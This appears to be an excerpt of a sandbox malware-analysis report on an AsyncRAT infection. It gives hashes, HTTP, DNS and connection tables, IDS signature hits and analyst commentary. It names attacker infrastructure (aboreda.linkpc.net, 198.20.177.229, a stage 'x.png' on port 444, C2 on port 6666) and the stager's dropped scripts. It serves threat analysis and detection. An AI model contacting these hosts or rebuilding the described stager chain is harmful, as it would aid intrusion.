  SHA256: 8C46090FB44AF131902A35351D71A5026EEEF32B3CAF880A0C7398BE5D3AD85F
3112 powershell.exe  C:\Users\admin\AppData\Local\Temp\epblj1av.etq.ps1  binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

Which of these matter: the five random-named Temp\*.ps1 and *.psm1 files all carry the hashes of the one-byte string "1" (MD5 C4CA4238..., SHA256 6B86B273...) and, like the StartupProfileData file, are PowerShell runtime artefacts rather than payloads. The CryptnetUrlCache entry is Windows' certificate-chain cache from the CTL download. The three files worth collecting are the ones the stager wrote under %AppData%\Roaming\Logs: Loader.vbs (the scheduled-task action), install.ps1 (run by PID 3112, which registers the tasks) and Report.ps1 (run by PID 1260, which starts aspnet_compiler.exe).
HTTP(S) requests: 2
TCP/UDP connections: 3
DNS requests: 2
Threats: 6

HTTP requests (PID, process, method, HTTP code, IP, URL, CN, type, size, reputation)

1112 powershell.exe  GET 200  198.20.177.229:444  http://198.20.177.229:444/x.png  US  text  243 Kb  malicious
2116 aspnet_compiler.exe  GET 200  95.140.236.128:80  http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9f7f011d88e2d5c1  GB  compressed  61.4 Kb  whitelisted

The first request is the stage fetched by the decoded DownloadString cradle: a 243 KB body typed as text, served as "x.png" on the non-standard port 444. It is PID 1112's only HTTP transaction, so the two ET signatures that fired on that process (hex executable string, 0a0a0a0a heap-spray string) fired on this response. The second is the automatic Windows root-certificate (CTL) download that certificate-chain validation triggers, consistent with aspnet_compiler.exe reading System Certificates settings before its TLS connection to the C2.

Connections (PID, process, IP, domain, ASN, CN, reputation)

2116 aspnet_compiler.exe  95.140.236.128:80  ctldl.windowsupdate.com  LLNW  US  malicious
1112 powershell.exe  198.20.177.229:444  aboreda.linkpc.net  SERVER-MANIA  US  malicious
2116 aspnet_compiler.exe  198.20.177.229:6666  aboreda.linkpc.net  SERVER-MANIA  US  malicious

The ctldl.windowsupdate.com connection is marked malicious here but whitelisted in the HTTP and DNS tables; it is Microsoft's CTL distribution endpoint, not attacker infrastructure. The same host serves both the stage download (port 444, fetched by powershell.exe) and the AsyncRAT C2 (port 6666, used by aspnet_compiler.exe), matching the Ports and C2 values in the extracted configuration.

DNS requests (domain, resolved IPs, reputation)

aboreda.linkpc.net  198.20.177.229  malicious
ctldl.windowsupdate.com  95.140.236.128, 178.79.242.128  whitelisted

Threats (PID, process, class, message)

1112 powershell.exe  Misc activity  ET INFO [TW] Likely Hex Executable String
1112 powershell.exe  Executable code was detected  ET SHELLCODE Common 0a0a0a0a Heap Spray String
(no PID recorded in this excerpt)  Potentially Bad Traffic  ET INFO Observed DNS Query to DynDNS Domain (linkpc .net)
2116 aspnet_compiler.exe  A Network Trojan was detected  ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)
2116 aspnet_compiler.exe  A Network Trojan was detected  ET TROJAN Generic AsyncRAT Style SSL Cert

One further ETPRO signature is listed only in the full report. The two SSL-certificate signatures match the CN=AsyncRAT Server certificate embedded in the extracted configuration, which the RAT presents on its port 6666 connection.